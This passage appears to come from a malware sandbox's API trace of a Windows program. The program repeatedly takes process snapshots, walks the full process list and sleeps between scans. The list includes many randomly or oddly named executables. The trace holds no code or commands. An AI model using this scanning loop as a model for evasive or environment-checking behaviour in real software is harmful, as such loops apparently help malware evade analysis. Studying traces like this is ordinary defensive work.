cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.903] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.917] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.920] CloseHandle (hObject=0xbc) returned 1 [0107.920] Sleep (dwMilliseconds=0x12c) [0108.272] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.277] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.421] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.424] CloseHandle (hObject=0xc4) returned 1 [0108.424] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.428] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.430] Process32NextW (in: 